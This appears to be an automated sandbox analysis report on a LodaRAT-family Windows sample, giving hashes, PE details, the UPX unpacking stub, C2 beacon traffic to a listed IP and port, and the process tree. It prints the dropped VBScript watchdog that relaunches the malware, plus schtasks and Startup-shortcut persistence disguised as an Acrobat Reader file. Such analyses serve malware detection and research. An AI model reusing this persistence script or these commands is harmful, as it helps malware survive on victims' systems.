                  172.111.138.100gry.exeGet hashmaliciousUnknownBrowse
                    dlawt.exeGet hashmaliciousLodaRatBrowse
                      nXi3rwhMmB.exeGet hashmaliciousLodaRatBrowse

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        VOXILITYGB3DD0A5685E10EF6D63758CAFEE7C651F8AE80A4766415.exeGet hashmaliciousDCRatBrowse
                        • 5.254.105.122
                        gry.exeGet hashmaliciousUnknownBrowse
                        • 172.111.138.100
                        file.exeGet hashmaliciousVidar, XmrigBrowse
                        • 172.94.15.211
                        file.exeGet hashmaliciousVidar, XmrigBrowse
                        • 172.94.15.211
                        a3it5k4FkD.exeGet hashmaliciousXWormBrowse
                        • 172.94.9.95
                        eMAEe8LX4T.exeGet hashmaliciousXWormBrowse
                        • 172.94.9.95
                        TRADING_ADVISORY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 104.250.181.155
                        R8dbGhYG6e.exeGet hashmaliciousUnknownBrowse
                        • 172.94.9.95
                        R8dbGhYG6e.exeGet hashmaliciousUnknownBrowse
                        • 172.94.9.95
                        Payment_Copy.docx.vbsGet hashmaliciousAgentTesla, WSHRATBrowse
                        • 104.243.242.103
                        Payment_Copy.pdf.jsGet hashmaliciousWSHRATBrowse
                        • 104.243.242.12
                        bQ1X.exeGet hashmaliciousRemcosBrowse
                        • 172.111.139.116
                        bQta.exeGet hashmaliciousRemcosBrowse
                        • 172.111.139.193
                        SOA00291.pdf.exeGet hashmaliciousNanocoreBrowse
                        • 104.250.181.155
                        FAKTURA_I.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                        • 172.94.12.73
                        SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exeGet hashmaliciousXWormBrowse
                        • 172.111.138.90
                        zg9ZjvXyS0.exeGet hashmaliciousXmrigBrowse
                        • 172.94.15.211
                        zqdZqQhxI1QOUR2.exeGet hashmaliciousXWormBrowse
                        • 45.74.7.170
                        dlawt.exeGet hashmaliciousLodaRatBrowse
                        • 172.111.138.100
                        https://gem.godaddy.com/signups/activate/MS0tRkJxS0E5V0lDNkx5b2JKZ3gyTUt3bVNoYkZXU053V2lQSVl6NzZlaTB4cHdoRHlxaFJuRGsrMWhXS2hIY1ZTUXhWVENKN3hvR3pZbjlpTT0tLVVzMmdScDBaclRxY3Q5UG8tLXFBRDNrV1hwbmhOK1VZMEFrSGc2ZVE9PQ==?signup=6884095Get hashmaliciousUnknownBrowse
                        • 45.74.8.8

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Temp\JWPING.vbs

                        Download File
                        Process:C:\Users\user\Desktop\bf-p2b.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):821
                        Entropy (8bit):5.342775569223086
                        Encrypted:false
                        SSDEEP:24:dF/UZkEU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/Uot+G+7xLxe0WABNVIqZaVzgA
                        MD5:974653F76FF545E2A170ED3327C3B009
                        SHA1:D0A3C95F769032AC1F080D7B1900B2E7F2DFC316
                        SHA-256:036034A734FE39B95AD3C536AC75675F955AF07FD6FE5B2BBDDBD76E48DE2D9F
                        SHA-512:8B17DA4AF636006ED081F296BA845CF34B02E3E4BBE55D6CA27841B1E26C2D3B0821EDE6E8998B7FF3717F22E8825A7D21E41FF70F3C90591EF8147213205AF9
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\JWPING.vbs, Author: Joe Security
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        Reputation:low
                        Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "bf-p2b.exe"..fileset = """C:\Users\user\Desktop\bf-p2b.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JWPING.lnk

                        Download File
                        Process:C:\Users\user\Desktop\bf-p2b.exe
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Thu Nov 30 15:06:55 2023, mtime=Thu Nov 30 15:06:55 2023, atime=Thu Nov 30 15:06:55 2023, length=1049600, window=hide
                        Category:dropped
                        Size (bytes):1902
                        Entropy (8bit):3.4727309956615144
                        Encrypted:false
                        SSDEEP:24:8EEG8+CDxeELgyED9vA9TT1ePED9arE2+s9T4IlDyrGBm:8EEPDxV0KJT884br9MIlF
                        MD5:A49AC8CFA5CC9E7C2E38112E41314AEE
                        SHA1:6CD1B102ACC4D370FFD8048D0278C24679A61456
                        SHA-256:82120353F9D49D6CC9088BA94AAD683DEA301165E7ED0198588E181476E41466
                        SHA-512:30F0C9FED682CB4D8D6EF131B930B1561D3A9E95063766C9CDA37416581C6D8E495E0CC82A3992D91036F16A5CD204599D2B9187457F0588266030349A19859C
                        Malicious:false
                        Reputation:low
                        Preview:L..................F.@.. .....)=.#....+=.#....+=.#............................:..DG..Yr?.D..U..k0.&...&......vk.v....^/......P.H=.#......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^~W............................%..A.p.p.D.a.t.a...B.V.1.....DW.D..Roaming.@......CW.^~W...........................r.6.R.o.a.m.i.n.g.....V.1.....~W...Windata.@......~W.~W.............................q.W.i.n.d.a.t.a.......2.....~W. .SOFTWA~1.EXE..l......~W.~W.............................`.S.o.f.t.w.a.r.e.f.x.-.A.c.r.o.b.a.t.-.R.e.a.d.e.r...e.x.e.......s...............-.......r...........5]]......C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe..4.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.S.o.f.t.w.a.r.e.f.x.-.A.c.r.o.b.a.t.-.R.e.a.d.e.r...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..............

                        C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe

                        Download File
                        Process:C:\Users\user\Desktop\bf-p2b.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Category:dropped
                        Size (bytes):1049600
                        Entropy (8bit):7.716346330255184
                        Encrypted:false
                        SSDEEP:24576:nhloDX0XOf4WaJIlk9tI9DF9Z3HgVFVi:nhloJfPlAt6p/3A7V
                        MD5:1446D857FE2760CFF287A534295226F4
                        SHA1:79C0484ED853D1AB8AB3942854666C0C59363721
                        SHA-256:DC93CB125EB5D10C02312B369EE50060E0A3ED28001864BBA114DC28111E3CFD
                        SHA-512:F7D50C9691A1F4119C292BD74067D6AAC42CAC7290896C969253D7F6FC7A9C3BB00AE1696399BADFA0DBFCA5BD278B2315701910CFAE296AA8F6E6EDEE2FC5C9
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 49%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L.....ce.........."......P...........0.......@....@...........................#...........@...@.......@.....................|.".$....@..|....................."......................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Entropy (8bit):7.716346330255184
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.39%
                        • UPX compressed Win32 Executable (30571/9) 0.30%
                        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        File name:bf-p2b.exe
                        File size:1'049'600 bytes
                        MD5:1446d857fe2760cff287a534295226f4
                        SHA1:79c0484ed853d1ab8ab3942854666c0c59363721
                        SHA256:dc93cb125eb5d10c02312b369ee50060e0a3ed28001864bba114dc28111e3cfd
                        SHA512:f7d50c9691a1f4119c292bd74067d6aac42cac7290896c969253d7f6fc7a9c3bb00ae1696399badfa0dbfca5bd278b2315701910cfae296aa8f6e6edee2fc5c9
                        SSDEEP:24576:nhloDX0XOf4WaJIlk9tI9DF9Z3HgVFVi:nhloJfPlAt6p/3A7V
                        TLSH:CD25019AAD419D07C7F361B2FB9085B330191E357A61587895B93F3B32F8C879B86720
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich...........

                        File Icon

                        Icon Hash:71b29131e39de423

                        Static PE Info

                        General

                        Entrypoint:0x5830e0
                        Entrypoint Section:UPX1
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6563848E [Sun Nov 26 17:46:54 2023 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:ef471c0edf1877cd5a881a6a8bf647b9

                        Entrypoint Preview

                        Instruction
                        pushad
                        mov esi, 0052F000h
                        lea edi, dword ptr [esi-0012E000h]
                        push edi
                        jmp 00007F52B0B4734Dh
                        nop
                        mov al, byte ptr [esi]
                        inc esi
                        mov byte ptr [edi], al
                        inc edi
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F52B0B4732Fh
                        mov eax, 00000001h
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        add ebx, ebx
                        jnc 00007F52B0B4734Dh
                        jne 00007F52B0B4736Ah
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F52B0B47361h
                        dec eax
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        jmp 00007F52B0B47316h
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        jmp 00007F52B0B47394h
                        xor ecx, ecx
                        sub eax, 03h
                        jc 00007F52B0B47353h
                        shl eax, 08h
                        mov al, byte ptr [esi]
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007F52B0B473B7h
                        sar eax, 1
                        mov ebp, eax
                        jmp 00007F52B0B4734Dh
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F52B0B4730Eh
                        inc ecx
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F52B0B47300h
                        add ebx, ebx
                        jne 00007F52B0B47349h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        add ebx, ebx
                        jnc 00007F52B0B47331h
                        jne 00007F52B0B4734Bh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jnc 00007F52B0B47326h
                        add ecx, 02h
                        cmp ebp, FFFFFB00h
                        adc ecx, 02h
                        lea edx, dword ptr [edi+ebp]
                        cmp ebp, FFFFFFFCh
                        jbe 00007F52B0B47350h
                        mov al, byte ptr [edx]

                        Rich Headers

                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [ASM] VS2012 UPD4 build 61030
                        • [RES] VS2012 UPD4 build 61030
                        • [LNK] VS2012 UPD4 build 61030

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x22f67c0x424.rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1840000xab67c.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x22faa00xc.rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1832c40x48UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        UPX00x10000x12e0000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        UPX10x12f0000x550000x54400False0.9884956880563798data7.936284427117873IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x1840000xac0000xabc00False0.7830098025836972data7.538368475780757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0x1844d40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                        RT_ICON0x1846000x400ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9961580680570802
                        RT_ICON0x1886140x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.13257127646989234
                        RT_ICON0x198e400x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.19468677738070211
                        RT_ICON0x1a22ec0x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishGreat Britain0.20830827067669172
                        RT_ICON0x1a8ad80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.22144177449168206
                        RT_ICON0x1adf640x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.21941426547000473
                        RT_ICON0x1b21900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.29937759336099584
                        RT_ICON0x1b473c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.3419324577861163
                        RT_ICON0x1b57e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5310283687943262
                        RT_STRING0xf5c280x594emptyEnglishGreat Britain0
                        RT_STRING0xf61bc0x68aemptyEnglishGreat Britain0
                        RT_STRING0xf68480x490emptyEnglishGreat Britain0
                        RT_STRING0xf6cd80x5fcemptyEnglishGreat Britain0
                        RT_STRING0xf72d40x65cemptyEnglishGreat Britain0
                        RT_STRING0xf79300x466emptyEnglishGreat Britain0
                        RT_STRING0xf7d980x158emptyEnglishGreat Britain0
                        RT_RCDATA0x1b5c540x794f2data1.0003240205924142
                        RT_GROUP_ICON0x22f14c0x84dataEnglishGreat Britain0.7272727272727273
                        RT_GROUP_ICON0x22f1d40x14dataEnglishGreat Britain1.15
                        RT_VERSION0x22f1ec0xdcdataEnglishGreat Britain0.6181818181818182
                        RT_MANIFEST0x22f2cc0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                        Imports

                        DLLImport
                        KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                        ADVAPI32.dllAddAce
                        COMCTL32.dllImageList_Remove
                        COMDLG32.dllGetSaveFileNameW
                        GDI32.dllLineTo
                        IPHLPAPI.DLLIcmpSendEcho
                        MPR.dllWNetUseConnectionW
                        ole32.dllCoGetObject
                        OLEAUT32.dllVariantInit
                        PSAPI.DLLGetProcessMemoryInfo
                        SHELL32.dllDragFinish
                        USER32.dllGetDC
                        USERENV.dllLoadUserProfileW
                        UxTheme.dllIsThemeActive
                        VERSION.dllVerQueryValueW
                        WININET.dllFtpOpenFileW
                        WINMM.dlltimeGetTime
                        WSOCK32.dllsocket

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishGreat Britain

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        192.168.2.4172.111.138.1004973655522849885 11/30/23-17:07:37.309723TCP2849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin497365552192.168.2.4172.111.138.100
                        192.168.2.4172.111.138.1004973655522822116 11/30/23-17:07:37.309723TCP2822116ETPRO TROJAN Loda Logger CnC Beacon497365552192.168.2.4172.111.138.100
                        172.111.138.100192.168.2.45552497362830912 11/30/23-17:08:57.785609TCP2830912ETPRO TROJAN Loda Logger CnC Beacon Response M2555249736172.111.138.100192.168.2.4

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 30, 2023 17:07:05.657947063 CET497295552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:06.073431015 CET555249729172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:06.573442936 CET497295552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:07.130831957 CET555249729172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:07.635806084 CET497295552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:08.093849897 CET555249729172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:08.604543924 CET497295552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:09.121746063 CET555249729172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:09.635817051 CET497295552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:10.307450056 CET555249729172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:19.340179920 CET497355552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:20.059978008 CET555249735172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:20.573316097 CET497355552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:20.958200932 CET555249735172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:21.463917017 CET497355552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:22.005271912 CET555249735172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:22.510843992 CET497355552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:22.916419983 CET555249735172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:23.417045116 CET497355552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:23.868441105 CET555249735172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:32.871150970 CET497365552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:33.250902891 CET555249736172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:33.760818958 CET497365552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:34.169720888 CET555249736172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:34.682655096 CET497365552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:35.077801943 CET555249736172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:35.588896036 CET497365552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:37.308173895 CET555249736172.111.138.100192.168.2.4
                        Nov 30, 2023 17:07:37.309231043 CET497365552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:37.309722900 CET497365552192.168.2.4172.111.138.100
                        Nov 30, 2023 17:07:40.255747080 CET555249736172.111.138.100192.168.2.4
                        Nov 30, 2023 17:08:57.785609007 CET555249736172.111.138.100192.168.2.4
                        Nov 30, 2023 17:08:57.838962078 CET497365552192.168.2.4172.111.138.100

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:17:06:54
                        Start date:30/11/2023
                        Path:C:\Users\user\Desktop\bf-p2b.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\bf-p2b.exe
                        Imagebase:0xb00000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:1
                        Start time:17:06:55
                        Start date:30/11/2023
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:17:06:55
                        Start date:30/11/2023
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:3
                        Start time:17:06:55
                        Start date:30/11/2023
                        Path:C:\Windows\SysWOW64\wscript.exe
                        Wow64 process (32bit):true
                        Commandline:WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbs
                        Imagebase:0x320000
                        File size:147'456 bytes
                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2921107184.0000000003740000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2920013586.0000000003398000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        General

                        Target ID:4
                        Start time:17:06:56
                        Start date:30/11/2023
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1
                        Imagebase:0x80000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:17:06:57
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 49%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:6
                        Start time:17:07:01
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:7
                        Start time:17:07:04
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:9
                        Start time:17:07:12
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:12
                        Start time:17:07:20
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe"
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:13
                        Start time:17:08:00
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:15
                        Start time:17:09:00
                        Start date:30/11/2023
                        Path:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe
                        Imagebase:0xed0000
                        File size:1'049'600 bytes
                        MD5 hash:1446D857FE2760CFF287A534295226F4
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:7%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:8.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:43
